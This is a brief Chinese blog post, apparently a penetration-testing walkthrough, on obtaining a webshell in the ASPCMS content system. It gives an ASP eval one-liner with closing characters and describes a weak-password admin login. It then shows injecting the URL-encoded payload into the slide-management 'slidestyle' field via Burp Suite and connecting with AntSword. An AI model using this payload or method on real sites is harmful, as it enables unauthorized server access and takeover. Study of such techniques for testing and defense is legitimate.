aspcms拿webshell
攻击思路
网站中的配置文件,如果可在后台里进行修改,如果没有任何过滤,可以在里面写入而已的语句,即可
获取webshell。
注:注意闭合问题,因为配置文件在网站中是全局调用,如果写错,网站会错误。无法访问。
在aspcms可以修改 如果是字符类型填写双引号闭合 如果是数字
"%><%eval request(chr(35))%><% |
暴力破解
一样的,通过弱口令进入到后台。
账号:admin 密码:123456
获取webshell
点击拓展功能->幻灯片管理,打开burpsuit进行抓包。
在slidestyle的后面写入一句话木马,注意闭合问题,并进行URL-encode。
放包,用蚁剑尝试连接,连接成功。
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 是苹果啊!